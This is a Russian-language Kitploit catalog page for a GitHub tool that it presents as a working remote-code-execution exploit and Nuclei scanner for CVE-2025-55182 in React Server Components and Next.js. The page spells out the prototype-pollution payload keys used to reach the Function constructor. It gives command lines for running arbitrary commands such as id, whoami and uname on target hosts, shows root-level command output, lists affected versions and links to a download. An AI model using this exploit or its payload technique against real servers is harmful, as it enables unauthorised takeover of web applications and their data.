Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — CVE-2025-55182 — Эксплойт и сканер RCE для React Server Components Поддерживает внешние серверы и CLI-интерфейс | Kitploit
Инструменты/GitHubGitHub/sickwell/cve-2025-55182
Сканеры уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubsickwell/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 — Эксплойт и сканер RCE для React Server Components Поддерживает внешние серверы и CLI-интерфейс

Репозиторий
13619 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 — Эксплойт RCE для Server Actions в React и Next.js

Полнофункциональный эксплойт удалённого выполнения кода и сканер для CVE-2025-55182 в React/Next.js Server Actions.

Оригинальный PoC: Spritualkb/CVE-2025-55182-exp

Обзор

CVE-2025-55182 — это критическая уязвимость загрязнения прототипа (prototype pollution) в React Server Components, которая позволяет выполнять удалённый код. Этот репозиторий предоставляет как инструменты автоматического сканирования (шаблон Nuclei), так и инструменты ручной эксплуатации (Python-скрипт).

Механизм уязвимости:

Эксплойт использует загрязнение прототипа при десериализации React Flight Protocol. Он загрязняет Object.prototype.then через "$1:__proto__:then" и получает доступ к конструктору Function через _formData.get, установленный в "$1:constructor:constructor", затем внедряет вредоносный код через _prefix, который выполняется с помощью Function().

Инструменты

1. Шаблон Nuclei (cve-2025-55182.yaml)

Автоматический сканер уязвимостей, который выполняет команду id и получает вывод через заголовок X-Action-Redirect.

Использование:

root@kitploit:~
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml

Возможности:

  • Выполняет тестовую команду (id) для проверки RCE
  • Извлекает вывод команды из заголовков ответа
  • Несколько индикаторов обнаружения (статус 303, заголовки перенаправления, шаблоны ошибок)

2. Python-эксплойт RCE (CVE-2025-55182.py)

Полнофункциональный скрипт эксплойта RCE, который выполняет произвольные команды и получает вывод.

Использование:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Возможности:

  • Выполнение произвольных команд
  • Автоматическое извлечение вывода из заголовка X-Action-Redirect
  • Поддержка форматов HTTP/HTTPS и IP:PORT
  • Опция обхода проверки SSL-сертификата
  • Чистый, форматированный вывод

Результаты тестирования

Шаблон Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Python-эксплойт

root@kitploit:~
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"

============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================

[*] Target: http://localhost:3001
[*] Command: id
[*] Building payload...
[*] Sending exploit payload...

============================================================
[+] Command executed successfully!
============================================================
[+] Command Output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------

============================================================
[*] Exploitation attempt completed
============================================================

Затронутые версии

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (App Router с Server Actions)

Авторы

  • Оригинальный PoC: Spritualkb - CVE-2025-55182-exp

Ссылки

  • Консультация по безопасности React
  • Next.js GitHub

Отказ от ответственности

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ЦЕЛЕЙ ТЕСТИРОВАНИЯ

Скачать инструмент